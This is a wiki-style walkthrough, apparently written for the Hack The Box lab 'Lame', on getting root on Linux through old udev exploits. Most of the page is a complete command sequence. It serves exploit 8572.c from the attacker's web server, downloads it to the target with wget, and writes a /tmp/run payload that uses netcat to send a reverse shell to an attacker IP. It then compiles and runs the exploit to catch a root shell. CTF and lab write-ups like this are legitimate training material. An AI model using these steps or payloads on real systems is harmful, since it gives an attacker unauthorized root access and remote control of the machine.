This is an old revision of the document!
Priv Esc - udevd
If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…
Four local Linux exploits using udevd to escalate privileges to root:
- Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
- Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
- Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
- Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
Walk-Through Video described below:
On the target machine, see if udev is running:
ps ax | grep udevd
On the target machine, check the version of udev; run:
dkpg -l | grep udev # On HTB Lame I got version 117-8
Google the udev version or do a searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: The searchsploit results show a Path that is local in: /usr/share/exploitdb/exploits/…
-------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------- ---------------------- Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < | linux/local/8478.sh Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4 | linux/local/8572.c Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat | linux/local/41886.c Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E | linux/local/21848.rb -------------------------------------------------------- ----------------------
First, spin up a web server on hour Kali box (your attack machine, your machine) so we can move the exploit over onto the target box:
start apache2 service
Copy the exploit file over to the web server subdir:
cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/
Check & Read:
- cd into
/var/www/htmland make sure your file is there. Open it up with an editor and look at what it needs to run. - The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
- Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
- The exploit will execute
/tmp/run(a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.
From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget:
wget 10.10.14.11/8572 # that's the IP of your Kali/attack machine
Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So… build a text file…
touch run echo '#!/bin/sh' >> run echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run
When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine
You need to compile that .c file you copied to the target machine:
gcc 8572.c -o 8572 # name it whatever you want
Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target:
nc -nvlp 5555 # make sure it's the same port number
Now the listener is waiting for a connection on the Kali attack machine…
Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine.
./8572 2687
You should have a reverse shell on your Kali machine with root privileges on the target machine. Done.